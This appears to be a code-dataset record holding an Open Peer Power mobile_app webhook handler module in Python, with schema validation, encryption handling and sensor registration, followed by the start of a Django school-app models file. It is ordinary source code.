            config_entry.data[ATTR_DEVICE_NAME],
        )
        return error_response(ERR_ENCRYPTION_REQUIRED, "Encryption required")
    try:
        req_data = WEBHOOK_PAYLOAD_SCHEMA(req_data)
    except vol.Invalid as ex:
        err = vol.humanize.humanize_error(req_data, ex)
        _LOGGER.error("Received invalid webhook payload: %s", err)
        return empty_okay_response()
    webhook_type = req_data[ATTR_WEBHOOK_TYPE]
    webhook_payload = req_data.get(ATTR_WEBHOOK_DATA, {})
    # replace the payload with its decrypted form when encrypted
    if req_data[ATTR_WEBHOOK_ENCRYPTED]:
        enc_data = req_data[ATTR_WEBHOOK_ENCRYPTED_DATA]
        webhook_payload = _decrypt_payload(config_entry.data[CONF_SECRET], enc_data)
    if webhook_type not in WEBHOOK_COMMANDS:
        _LOGGER.error("Received invalid webhook type: %s", webhook_type)
        return empty_okay_response()
    _LOGGER.debug(
        "Received webhook payload for type %s: %s", webhook_type, webhook_payload
    )
    # dispatch to the handler registered for this webhook type
    return await WEBHOOK_COMMANDS[webhook_type](opp, config_entry, webhook_payload)
@WEBHOOK_COMMANDS.register("call_service")
@validate_schema(
    {
        vol.Required(ATTR_DOMAIN): cv.string,
        vol.Required(ATTR_SERVICE): cv.string,
        vol.Optional(ATTR_SERVICE_DATA, default={}): dict,
    }
)
async def webhook_call_service(opp, config_entry, data):
    """Handle a call service webhook.

    Calls the requested service synchronously on behalf of the registered
    device; any failure is reported back to the app as HTTP 400.
    """
    try:
        await opp.services.async_call(
            data[ATTR_DOMAIN],
            data[ATTR_SERVICE],
            data[ATTR_SERVICE_DATA],
            blocking=True,
            context=registration_context(config_entry.data),
        )
    # The original tuple (vol.Invalid, ServiceNotFound, Exception) was
    # redundant: Exception already subsumes the other two.
    except Exception as ex:
        _LOGGER.error(
            "Error when calling service during mobile_app "
            "webhook (device name: %s): %s",
            config_entry.data[ATTR_DEVICE_NAME],
            ex,
        )
        # chain the original exception so the cause is preserved in logs
        raise HTTPBadRequest() from ex

    return empty_okay_response()
@WEBHOOK_COMMANDS.register("fire_event")
@validate_schema(
    {
        vol.Required(ATTR_EVENT_TYPE): cv.string,
        vol.Optional(ATTR_EVENT_DATA, default={}): dict,
    }
)
async def webhook_fire_event(opp, config_entry, data):
    """Handle a fire event webhook.

    Fires the requested event on the event bus, marked as remote origin
    and attributed to this device's registration context.
    """
    event_type = data[ATTR_EVENT_TYPE]
    opp.bus.async_fire(
        event_type,
        data[ATTR_EVENT_DATA],
        # EventOrigin.remote marks the event as externally triggered
        EventOrigin.remote,
        context=registration_context(config_entry.data),
    )
    return empty_okay_response()
@WEBHOOK_COMMANDS.register("render_template")
@validate_schema(
    {
        str: {
            vol.Required(ATTR_TEMPLATE): cv.template,
            vol.Optional(ATTR_TEMPLATE_VARIABLES, default={}): dict,
        }
    }
)
async def webhook_render_template(opp, config_entry, data):
    """Handle a render template webhook.

    Renders each named template in the payload and returns a mapping of
    name -> rendered value; a failing template yields an error dict for
    that key instead of failing the whole request.
    """
    resp = {}
    for key, item in data.items():
        try:
            tpl = item[ATTR_TEMPLATE]
            attach(opp, tpl)
            resp[key] = tpl.async_render(item.get(ATTR_TEMPLATE_VARIABLES))
        except TemplateError as ex:
            # per-key error so other templates still render
            resp[key] = {"error": str(ex)}
    return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("update_location")
@validate_schema(
    {
        vol.Optional(ATTR_LOCATION_NAME): cv.string,
        vol.Required(ATTR_GPS): cv.gps,
        vol.Required(ATTR_GPS_ACCURACY): cv.positive_int,
        vol.Optional(ATTR_BATTERY): cv.positive_int,
        vol.Optional(ATTR_SPEED): cv.positive_int,
        vol.Optional(ATTR_ALTITUDE): vol.Coerce(float),
        vol.Optional(ATTR_COURSE): cv.positive_int,
        vol.Optional(ATTR_VERTICAL_ACCURACY): cv.positive_int,
    }
)
async def webhook_update_location(opp, config_entry, data):
    """Handle an update location webhook.

    Forwards the validated location payload to this entry's device_tracker
    via the dispatcher; no state is stored here.
    """
    opp.helpers.dispatcher.async_dispatcher_send(
        SIGNAL_LOCATION_UPDATE.format(config_entry.entry_id), data
    )
    return empty_okay_response()
@WEBHOOK_COMMANDS.register("update_registration")
@validate_schema(
    {
        vol.Optional(ATTR_APP_DATA, default={}): dict,
        vol.Required(ATTR_APP_VERSION): cv.string,
        vol.Required(ATTR_DEVICE_NAME): cv.string,
        vol.Required(ATTR_MANUFACTURER): cv.string,
        vol.Required(ATTR_MODEL): cv.string,
        vol.Optional(ATTR_OS_VERSION): cv.string,
    }
)
async def webhook_update_registration(opp, config_entry, data):
    """Handle an update registration webhook.

    Merges the new fields over the stored registration, refreshes the
    device registry entry, persists the config entry, and returns the
    sanitized registration to the app.
    """
    # incoming fields override the previously stored registration
    new_registration = {**config_entry.data, **data}
    device_registry = await dr.async_get_registry(opp)
    # NOTE(review): ATTR_OS_VERSION is optional in the schema; this lookup
    # raises KeyError when it is absent from both payload and stored data —
    # confirm whether a .get() is needed here.
    device_registry.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        identifiers={(DOMAIN, config_entry.data[ATTR_DEVICE_ID])},
        manufacturer=new_registration[ATTR_MANUFACTURER],
        model=new_registration[ATTR_MODEL],
        name=new_registration[ATTR_DEVICE_NAME],
        sw_version=new_registration[ATTR_OS_VERSION],
    )
    opp.config_entries.async_update_entry(config_entry, data=new_registration)
    return webhook_response(
        safe_registration(new_registration),
        registration=new_registration,
    )
@WEBHOOK_COMMANDS.register("enable_encryption")
async def webhook_enable_encryption(opp, config_entry, data):
    """Handle an encryption enable webhook.

    Generates a new NaCl SecretBox key, stores it on the registration, and
    returns the secret to the app.  Fails when encryption is already on or
    libsodium support is missing.
    """
    if config_entry.data[ATTR_SUPPORTS_ENCRYPTION]:
        _LOGGER.warning(
            "Refusing to enable encryption for %s because it is already enabled!",
            config_entry.data[ATTR_DEVICE_NAME],
        )
        return error_response(
            ERR_ENCRYPTION_ALREADY_ENABLED, "Encryption already enabled"
        )
    if not supports_encryption():
        _LOGGER.warning(
            "Unable to enable encryption for %s because libsodium is unavailable!",
            config_entry.data[ATTR_DEVICE_NAME],
        )
        return error_response(ERR_ENCRYPTION_NOT_AVAILABLE, "Encryption is unavailable")
    # cryptographically secure hex key sized for NaCl SecretBox
    secret = secrets.token_hex(SecretBox.KEY_SIZE)
    data = {**config_entry.data, ATTR_SUPPORTS_ENCRYPTION: True, CONF_SECRET: secret}
    opp.config_entries.async_update_entry(config_entry, data=data)
    return json_response({"secret": secret})
@WEBHOOK_COMMANDS.register("register_sensor")
@validate_schema(
    {
        vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
        vol.Optional(ATTR_SENSOR_DEVICE_CLASS): vol.All(
            vol.Lower, vol.In(COMBINED_CLASSES)
        ),
        vol.Required(ATTR_SENSOR_NAME): cv.string,
        vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
        vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
        vol.Optional(ATTR_SENSOR_UOM): cv.string,
        vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
        vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
    }
)
async def webhook_register_sensor(opp, config_entry, data):
    """Handle a register sensor webhook.

    Stores the new sensor definition (rejecting duplicates with 409),
    persists the registration store, and signals the sensor platform to
    create the entity.  Returns 201 Created on success.
    """
    entity_type = data[ATTR_SENSOR_TYPE]
    unique_id = data[ATTR_SENSOR_UNIQUE_ID]

    # per-registration key so different devices can reuse unique ids
    unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"

    if unique_store_key in opp.data[DOMAIN][entity_type]:
        _LOGGER.error("Refusing to re-register existing sensor %s!", unique_id)
        return error_response(
            ERR_SENSOR_DUPLICATE_UNIQUE_ID,
            f"{entity_type} {unique_id} already exists!",
            status=409,
        )

    data[CONF_WEBHOOK_ID] = config_entry.data[CONF_WEBHOOK_ID]
    opp.data[DOMAIN][entity_type][unique_store_key] = data

    try:
        await opp.data[DOMAIN][DATA_STORE].async_save(savable_state(opp))
    except OpenPeerPowerError as ex:
        _LOGGER.error("Error registering sensor: %s", ex)
        return empty_okay_response()

    # f-string for consistency with the rest of this module
    register_signal = f"{DOMAIN}_{data[ATTR_SENSOR_TYPE]}_register"
    async_dispatcher_send(opp, register_signal, data)

    return webhook_response(
        {"success": True},
        registration=config_entry.data,
        status=HTTP_CREATED,
    )
@WEBHOOK_COMMANDS.register("update_sensor_states")
@validate_schema(
    vol.All(
        cv.ensure_list,
        [
            vol.Schema(
                {
                    vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
                    vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
                    vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
                    vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
                    vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
                }
            )
        ],
    )
)
async def webhook_update_sensor_states(opp, config_entry, data):
    """Handle an update sensor states webhook.

    Updates each listed sensor's stored state, persists the store, and
    notifies entities via dispatcher.  Returns a per-unique-id success/error
    mapping; unknown sensors are reported without aborting the batch.
    """
    resp = {}
    for sensor in data:
        entity_type = sensor[ATTR_SENSOR_TYPE]

        unique_id = sensor[ATTR_SENSOR_UNIQUE_ID]

        # keyed per registration, matching webhook_register_sensor
        unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"

        if unique_store_key not in opp.data[DOMAIN][entity_type]:
            _LOGGER.error(
                "Refusing to update non-registered sensor: %s", unique_store_key
            )
            err_msg = f"{entity_type} {unique_id} is not registered"
            resp[unique_id] = {
                "success": False,
                "error": {"code": ERR_SENSOR_NOT_REGISTERED, "message": err_msg},
            }
            continue

        entry = opp.data[DOMAIN][entity_type][unique_store_key]

        # incoming fields override the stored sensor definition
        new_state = {**entry, **sensor}

        opp.data[DOMAIN][entity_type][unique_store_key] = new_state

        safe = savable_state(opp)

        try:
            await opp.data[DOMAIN][DATA_STORE].async_save(safe)
        except OpenPeerPowerError as ex:
            _LOGGER.error("Error updating mobile_app registration: %s", ex)
            return empty_okay_response()

        async_dispatcher_send(opp, SIGNAL_SENSOR_UPDATE, new_state)

        resp[unique_id] = {"success": True}

    return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_zones")
async def webhook_get_zones(opp, config_entry, data):
    """Return the states of all zone entities, sorted by entity id."""
    zone_ids = sorted(opp.states.async_entity_ids(ZONE_DOMAIN))
    zones = [opp.states.get(zone_id) for zone_id in zone_ids]
    return webhook_response(zones, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_config")
async def webhook_get_config(opp, config_entry, data):
    """Handle a get config webhook.

    Returns the core location/unit configuration plus, when available, the
    cloudhook and remote UI URLs for this registration.
    """
    opp_config = opp.config.as_dict()
    resp = {
        "latitude": opp_config["latitude"],
        "longitude": opp_config["longitude"],
        "elevation": opp_config["elevation"],
        "unit_system": opp_config["unit_system"],
        "location_name": opp_config["location_name"],
        "time_zone": opp_config["time_zone"],
        "components": opp_config["components"],
        "version": opp_config["version"],
        "theme_color": MANIFEST_JSON["theme_color"],
    }
    if CONF_CLOUDHOOK_URL in config_entry.data:
        resp[CONF_CLOUDHOOK_URL] = config_entry.data[CONF_CLOUDHOOK_URL]
    # remote UI URL is best-effort: cloud may not be configured/connected
    try:
        resp[CONF_REMOTE_UI_URL] = opp.components.cloud.async_remote_ui_url()
    except opp.components.cloud.CloudNotAvailable:
        pass
    return webhook_response(resp, registration=config_entry.data)
| 32.12449 | 88 | 0.688711 | from functools import wraps
import logging
import secrets
from aiohttp.web import HTTPBadRequest, Request, Response, json_response
from nacl.secret import SecretBox
import voluptuous as vol
from openpeerpower.components.binary_sensor import (
DEVICE_CLASSES as BINARY_SENSOR_CLASSES,
)
from openpeerpower.components.device_tracker import (
ATTR_BATTERY,
ATTR_GPS,
ATTR_GPS_ACCURACY,
ATTR_LOCATION_NAME,
)
from openpeerpower.components.frontend import MANIFEST_JSON
from openpeerpower.components.sensor import DEVICE_CLASSES as SENSOR_CLASSES
from openpeerpower.components.zone.const import DOMAIN as ZONE_DOMAIN
from openpeerpower.const import (
ATTR_DOMAIN,
ATTR_SERVICE,
ATTR_SERVICE_DATA,
CONF_WEBHOOK_ID,
HTTP_BAD_REQUEST,
HTTP_CREATED,
)
from openpeerpower.core import EventOrigin
from openpeerpower.exceptions import OpenPeerPowerError, ServiceNotFound, TemplateError
from openpeerpower.helpers import config_validation as cv, device_registry as dr
from openpeerpower.helpers.dispatcher import async_dispatcher_send
from openpeerpower.helpers.template import attach
from openpeerpower.helpers.typing import OpenPeerPowerType
from openpeerpower.util.decorator import Registry
from .const import (
ATTR_ALTITUDE,
ATTR_APP_DATA,
ATTR_APP_VERSION,
ATTR_COURSE,
ATTR_DEVICE_ID,
ATTR_DEVICE_NAME,
ATTR_EVENT_DATA,
ATTR_EVENT_TYPE,
ATTR_MANUFACTURER,
ATTR_MODEL,
ATTR_OS_VERSION,
ATTR_SENSOR_ATTRIBUTES,
ATTR_SENSOR_DEVICE_CLASS,
ATTR_SENSOR_ICON,
ATTR_SENSOR_NAME,
ATTR_SENSOR_STATE,
ATTR_SENSOR_TYPE,
ATTR_SENSOR_TYPE_BINARY_SENSOR,
ATTR_SENSOR_TYPE_SENSOR,
ATTR_SENSOR_UNIQUE_ID,
ATTR_SENSOR_UOM,
ATTR_SPEED,
ATTR_SUPPORTS_ENCRYPTION,
ATTR_TEMPLATE,
ATTR_TEMPLATE_VARIABLES,
ATTR_VERTICAL_ACCURACY,
ATTR_WEBHOOK_DATA,
ATTR_WEBHOOK_ENCRYPTED,
ATTR_WEBHOOK_ENCRYPTED_DATA,
ATTR_WEBHOOK_TYPE,
CONF_CLOUDHOOK_URL,
CONF_REMOTE_UI_URL,
CONF_SECRET,
DATA_CONFIG_ENTRIES,
DATA_DELETED_IDS,
DATA_STORE,
DOMAIN,
ERR_ENCRYPTION_ALREADY_ENABLED,
ERR_ENCRYPTION_NOT_AVAILABLE,
ERR_ENCRYPTION_REQUIRED,
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
ERR_SENSOR_NOT_REGISTERED,
SIGNAL_LOCATION_UPDATE,
SIGNAL_SENSOR_UPDATE,
)
from .helpers import (
_decrypt_payload,
empty_okay_response,
error_response,
registration_context,
safe_registration,
savable_state,
supports_encryption,
webhook_response,
)
_LOGGER = logging.getLogger(__name__)
WEBHOOK_COMMANDS = Registry()
COMBINED_CLASSES = set(BINARY_SENSOR_CLASSES + SENSOR_CLASSES)
SENSOR_TYPES = [ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR]
WEBHOOK_PAYLOAD_SCHEMA = vol.Schema(
{
vol.Required(ATTR_WEBHOOK_TYPE): cv.string,
vol.Required(ATTR_WEBHOOK_DATA, default={}): vol.Any(dict, list),
vol.Optional(ATTR_WEBHOOK_ENCRYPTED, default=False): cv.boolean,
vol.Optional(ATTR_WEBHOOK_ENCRYPTED_DATA): cv.string,
}
)
def validate_schema(schema):
    """Decorator factory: validate a webhook handler's payload with *schema*.

    Invalid payloads are logged and answered with an empty OK response
    instead of ever reaching the wrapped handler.
    """
    if isinstance(schema, dict):
        # Accept a plain dict for convenience; wrap it into a Schema.
        schema = vol.Schema(schema)
    def wrapper(func):
        @wraps(func)
        async def validate_and_run(opp, config_entry, data):
            try:
                data = schema(data)
            except vol.Invalid as ex:
                err = vol.humanize.humanize_error(data, ex)
                _LOGGER.error("Received invalid webhook payload: %s", err)
                return empty_okay_response()
            return await func(opp, config_entry, data)
        return validate_and_run
    return wrapper
async def handle_webhook(
    opp: OpenPeerPowerType, webhook_id: str, request: Request
) -> Response:
    """Dispatch an incoming mobile_app webhook to its registered handler.

    Checks deletion status, parses/validates the JSON envelope, enforces and
    unwraps encryption, then routes to the matching WEBHOOK_COMMANDS entry.
    """
    # 410 Gone signals the app that this registration was deleted.
    if webhook_id in opp.data[DOMAIN][DATA_DELETED_IDS]:
        return Response(status=410)
    config_entry = opp.data[DOMAIN][DATA_CONFIG_ENTRIES][webhook_id]
    try:
        req_data = await request.json()
    except ValueError:
        _LOGGER.warning("Received invalid JSON from mobile_app")
        return empty_okay_response(status=HTTP_BAD_REQUEST)
    # A registration that declared encryption support must always encrypt.
    if (
        ATTR_WEBHOOK_ENCRYPTED not in req_data
        and config_entry.data[ATTR_SUPPORTS_ENCRYPTION]
    ):
        _LOGGER.warning(
            "Refusing to accept unencrypted webhook from %s",
            config_entry.data[ATTR_DEVICE_NAME],
        )
        return error_response(ERR_ENCRYPTION_REQUIRED, "Encryption required")
    try:
        req_data = WEBHOOK_PAYLOAD_SCHEMA(req_data)
    except vol.Invalid as ex:
        err = vol.humanize.humanize_error(req_data, ex)
        _LOGGER.error("Received invalid webhook payload: %s", err)
        return empty_okay_response()
    webhook_type = req_data[ATTR_WEBHOOK_TYPE]
    webhook_payload = req_data.get(ATTR_WEBHOOK_DATA, {})
    if req_data[ATTR_WEBHOOK_ENCRYPTED]:
        enc_data = req_data[ATTR_WEBHOOK_ENCRYPTED_DATA]
        webhook_payload = _decrypt_payload(config_entry.data[CONF_SECRET], enc_data)
    # Unknown command types are logged but still answered with an empty OK.
    if webhook_type not in WEBHOOK_COMMANDS:
        _LOGGER.error("Received invalid webhook type: %s", webhook_type)
        return empty_okay_response()
    _LOGGER.debug(
        "Received webhook payload for type %s: %s", webhook_type, webhook_payload
    )
    return await WEBHOOK_COMMANDS[webhook_type](opp, config_entry, webhook_payload)
@WEBHOOK_COMMANDS.register("call_service")
@validate_schema(
    {
        vol.Required(ATTR_DOMAIN): cv.string,
        vol.Required(ATTR_SERVICE): cv.string,
        vol.Optional(ATTR_SERVICE_DATA, default={}): dict,
    }
)
async def webhook_call_service(opp, config_entry, data):
    """Call a service on behalf of the mobile app; 400 on any failure."""
    try:
        await opp.services.async_call(
            data[ATTR_DOMAIN],
            data[ATTR_SERVICE],
            data[ATTR_SERVICE_DATA],
            blocking=True,
            context=registration_context(config_entry.data),
        )
    # The original tuple (vol.Invalid, ServiceNotFound, Exception) was
    # redundant: Exception already subsumes the two narrower types. The
    # intent (catch everything and report it) is preserved.
    except Exception as ex:  # pylint: disable=broad-except
        _LOGGER.error(
            "Error when calling service during mobile_app "
            "webhook (device name: %s): %s",
            config_entry.data[ATTR_DEVICE_NAME],
            ex,
        )
        # Chain the cause so the original failure stays in the traceback.
        raise HTTPBadRequest() from ex
    return empty_okay_response()
@WEBHOOK_COMMANDS.register("fire_event")
@validate_schema(
    {
        vol.Required(ATTR_EVENT_TYPE): cv.string,
        vol.Optional(ATTR_EVENT_DATA, default={}): dict,
    }
)
async def webhook_fire_event(opp, config_entry, data):
    """Fire an event on the bus on behalf of the registered mobile app."""
    opp.bus.async_fire(
        data[ATTR_EVENT_TYPE],
        data[ATTR_EVENT_DATA],
        EventOrigin.remote,
        context=registration_context(config_entry.data),
    )
    return empty_okay_response()
@WEBHOOK_COMMANDS.register("render_template")
@validate_schema(
    {
        str: {
            vol.Required(ATTR_TEMPLATE): cv.template,
            vol.Optional(ATTR_TEMPLATE_VARIABLES, default={}): dict,
        }
    }
)
async def webhook_render_template(opp, config_entry, data):
    """Render one or more templates; results are keyed by the request keys."""
    resp = {}
    for key, item in data.items():
        try:
            tpl = item[ATTR_TEMPLATE]
            attach(opp, tpl)
            resp[key] = tpl.async_render(item.get(ATTR_TEMPLATE_VARIABLES))
        except TemplateError as ex:
            # Report per-template errors instead of failing the whole batch.
            resp[key] = {"error": str(ex)}
    return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("update_location")
@validate_schema(
    {
        vol.Optional(ATTR_LOCATION_NAME): cv.string,
        vol.Required(ATTR_GPS): cv.gps,
        vol.Required(ATTR_GPS_ACCURACY): cv.positive_int,
        vol.Optional(ATTR_BATTERY): cv.positive_int,
        vol.Optional(ATTR_SPEED): cv.positive_int,
        vol.Optional(ATTR_ALTITUDE): vol.Coerce(float),
        vol.Optional(ATTR_COURSE): cv.positive_int,
        vol.Optional(ATTR_VERTICAL_ACCURACY): cv.positive_int,
    }
)
async def webhook_update_location(opp, config_entry, data):
    """Dispatch a validated location payload on this entry's location signal."""
    opp.helpers.dispatcher.async_dispatcher_send(
        SIGNAL_LOCATION_UPDATE.format(config_entry.entry_id), data
    )
    return empty_okay_response()
@WEBHOOK_COMMANDS.register("update_registration")
@validate_schema(
    {
        vol.Optional(ATTR_APP_DATA, default={}): dict,
        vol.Required(ATTR_APP_VERSION): cv.string,
        vol.Required(ATTR_DEVICE_NAME): cv.string,
        vol.Required(ATTR_MANUFACTURER): cv.string,
        vol.Required(ATTR_MODEL): cv.string,
        vol.Optional(ATTR_OS_VERSION): cv.string,
    }
)
async def webhook_update_registration(opp, config_entry, data):
    """Merge updated registration data into the config entry and device registry."""
    new_registration = {**config_entry.data, **data}
    device_registry = await dr.async_get_registry(opp)
    device_registry.async_get_or_create(
        config_entry_id=config_entry.entry_id,
        identifiers={(DOMAIN, config_entry.data[ATTR_DEVICE_ID])},
        manufacturer=new_registration[ATTR_MANUFACTURER],
        model=new_registration[ATTR_MODEL],
        name=new_registration[ATTR_DEVICE_NAME],
        sw_version=new_registration[ATTR_OS_VERSION],
    )
    opp.config_entries.async_update_entry(config_entry, data=new_registration)
    # safe_registration() presumably filters sensitive fields before echoing
    # the registration back to the app — see helpers.safe_registration.
    return webhook_response(
        safe_registration(new_registration),
        registration=new_registration,
    )
@WEBHOOK_COMMANDS.register("enable_encryption")
async def webhook_enable_encryption(opp, config_entry, data):
    """Generate a shared secret and enable encryption for this registration."""
    if config_entry.data[ATTR_SUPPORTS_ENCRYPTION]:
        _LOGGER.warning(
            "Refusing to enable encryption for %s because it is already enabled!",
            config_entry.data[ATTR_DEVICE_NAME],
        )
        return error_response(
            ERR_ENCRYPTION_ALREADY_ENABLED, "Encryption already enabled"
        )
    if not supports_encryption():
        _LOGGER.warning(
            "Unable to enable encryption for %s because libsodium is unavailable!",
            config_entry.data[ATTR_DEVICE_NAME],
        )
        return error_response(ERR_ENCRYPTION_NOT_AVAILABLE, "Encryption is unavailable")
    # token_hex(n) draws n random bytes -> a 2n-character hex string.
    secret = secrets.token_hex(SecretBox.KEY_SIZE)
    data = {**config_entry.data, ATTR_SUPPORTS_ENCRYPTION: True, CONF_SECRET: secret}
    opp.config_entries.async_update_entry(config_entry, data=data)
    return json_response({"secret": secret})
@WEBHOOK_COMMANDS.register("register_sensor")
@validate_schema(
    {
        vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
        vol.Optional(ATTR_SENSOR_DEVICE_CLASS): vol.All(
            vol.Lower, vol.In(COMBINED_CLASSES)
        ),
        vol.Required(ATTR_SENSOR_NAME): cv.string,
        vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
        vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
        vol.Optional(ATTR_SENSOR_UOM): cv.string,
        vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
        vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
    }
)
async def webhook_register_sensor(opp, config_entry, data):
    """Register a new sensor for this webhook's device; 409 on duplicates."""
    entity_type = data[ATTR_SENSOR_TYPE]
    unique_id = data[ATTR_SENSOR_UNIQUE_ID]
    # Namespace by webhook id so unique_ids only need to be unique per device.
    unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
    if unique_store_key in opp.data[DOMAIN][entity_type]:
        _LOGGER.error("Refusing to re-register existing sensor %s!", unique_id)
        return error_response(
            ERR_SENSOR_DUPLICATE_UNIQUE_ID,
            f"{entity_type} {unique_id} already exists!",
            status=409,
        )
    data[CONF_WEBHOOK_ID] = config_entry.data[CONF_WEBHOOK_ID]
    opp.data[DOMAIN][entity_type][unique_store_key] = data
    try:
        await opp.data[DOMAIN][DATA_STORE].async_save(savable_state(opp))
    except OpenPeerPowerError as ex:
        _LOGGER.error("Error registering sensor: %s", ex)
        return empty_okay_response()
    # f-string for consistency with the rest of the module (was str.format).
    register_signal = f"{DOMAIN}_{data[ATTR_SENSOR_TYPE]}_register"
    async_dispatcher_send(opp, register_signal, data)
    return webhook_response(
        {"success": True},
        registration=config_entry.data,
        status=HTTP_CREATED,
    )
@WEBHOOK_COMMANDS.register("update_sensor_states")
@validate_schema(
    vol.All(
        cv.ensure_list,
        [
            vol.Schema(
                {
                    vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
                    vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
                    vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
                    vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
                    vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
                }
            )
        ],
    )
)
async def webhook_update_sensor_states(opp, config_entry, data):
    """Update previously registered sensors; returns a per-sensor result map."""
    resp = {}
    for sensor in data:
        entity_type = sensor[ATTR_SENSOR_TYPE]
        unique_id = sensor[ATTR_SENSOR_UNIQUE_ID]
        # Store keys are namespaced per webhook id, mirroring register_sensor.
        unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
        if unique_store_key not in opp.data[DOMAIN][entity_type]:
            _LOGGER.error(
                "Refusing to update non-registered sensor: %s", unique_store_key
            )
            err_msg = f"{entity_type} {unique_id} is not registered"
            resp[unique_id] = {
                "success": False,
                "error": {"code": ERR_SENSOR_NOT_REGISTERED, "message": err_msg},
            }
            continue
        # Merge the update over the stored registration entry.
        entry = opp.data[DOMAIN][entity_type][unique_store_key]
        new_state = {**entry, **sensor}
        opp.data[DOMAIN][entity_type][unique_store_key] = new_state
        safe = savable_state(opp)
        try:
            await opp.data[DOMAIN][DATA_STORE].async_save(safe)
        except OpenPeerPowerError as ex:
            # NOTE(review): a save failure aborts the whole batch mid-way and
            # drops the per-sensor results accumulated so far.
            _LOGGER.error("Error updating mobile_app registration: %s", ex)
            return empty_okay_response()
        async_dispatcher_send(opp, SIGNAL_SENSOR_UPDATE, new_state)
        resp[unique_id] = {"success": True}
    return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_zones")
async def webhook_get_zones(opp, config_entry, data):
    """Return the state objects of all zones, sorted by entity id."""
    zone_ids = sorted(opp.states.async_entity_ids(ZONE_DOMAIN))
    zones = list(map(opp.states.get, zone_ids))
    return webhook_response(zones, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_config")
async def webhook_get_config(opp, config_entry, data):
    """Return a subset of the instance configuration to the mobile app."""
    full_config = opp.config.as_dict()
    # Copy only the whitelisted keys out of the full config dict.
    wanted = (
        "latitude",
        "longitude",
        "elevation",
        "unit_system",
        "location_name",
        "time_zone",
        "components",
        "version",
    )
    resp = {key: full_config[key] for key in wanted}
    resp["theme_color"] = MANIFEST_JSON["theme_color"]
    if CONF_CLOUDHOOK_URL in config_entry.data:
        resp[CONF_CLOUDHOOK_URL] = config_entry.data[CONF_CLOUDHOOK_URL]
    try:
        resp[CONF_REMOTE_UI_URL] = opp.components.cloud.async_remote_ui_url()
    except opp.components.cloud.CloudNotAvailable:
        pass
    return webhook_response(resp, registration=config_entry.data)
| true | true |
f70ffb5653d4966b0c8c0eb7aea68ce4980e6d72 | 7,639 | py | Python | lc101/school_app/models.py | Khoi938/AWS-SchoolApp | 64612718f2cf5e4fc0cd9622fcf51b9224776192 | [
"MIT"
] | null | null | null | lc101/school_app/models.py | Khoi938/AWS-SchoolApp | 64612718f2cf5e4fc0cd9622fcf51b9224776192 | [
"MIT"
] | 3 | 2020-06-05T18:33:38.000Z | 2021-06-10T20:22:00.000Z | lc101/school_app/models.py | Khoi938/AWS-SchoolApp | 64612718f2cf5e4fc0cd9622fcf51b9224776192 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
#------- Profile, Student, Teacher Model -------
## TODO Refactor CharField To Text Field Modify HTMl maxlength. WRONG USAGE!!! ALLL WRONG
class Profile(models.Model):
    """Per-user profile data.

    username/first/last/email/password live on the related Django auth User;
    this model carries contact, school, and about-me fields.
    """
    user = models.OneToOneField(User, null=True, on_delete=models.SET_NULL)
    street_address = models.CharField(max_length=200, blank=True)
    city = models.CharField(max_length=100, blank=True)
    state = models.CharField(max_length=100, blank=True)
    zip_code = models.CharField(max_length=20, blank=True)
    phone_number = models.CharField(max_length=20, blank=True)
    emergency_contact = models.CharField(max_length=20, blank=True)
    relationship = models.CharField(max_length=100, blank=True)
    middle_name = models.CharField(max_length=50, blank=True)
    birth_date = models.DateField(null=True, blank=True)
    # NOTE(review): default=0 on a CharField stores the string "0";
    # confirm whether default="" was intended.
    school_id = models.CharField(max_length=15, null=True, blank=True, default=0)
    is_student = models.BooleanField('Student', default=False)
    is_teacher = models.BooleanField('Teacher', default=False)
    about = models.TextField(max_length=300, blank=True)
    hobby = models.TextField(max_length=100, blank=True)
    favorite_food = models.TextField(max_length=100, blank=True)
    favorite_subject = models.TextField(max_length=100, blank=True)
    def __str__(self):
        # ``is None`` is the correct identity check; ``== None`` can be
        # defeated by a custom __eq__ and is non-idiomatic.
        if self.user is None:
            return 'User deleted - ' + str(self.school_id)
        return self.user.get_full_name()
@receiver(post_save, sender=User)  # Auto-create a Profile whenever a User is created.
def create_profile_object(sender, instance, created, **kwargs):
    """post_save hook: create the companion Profile for a newly created User."""
    if created:
        profile = Profile.objects.create(user=instance)
class Student(models.Model):
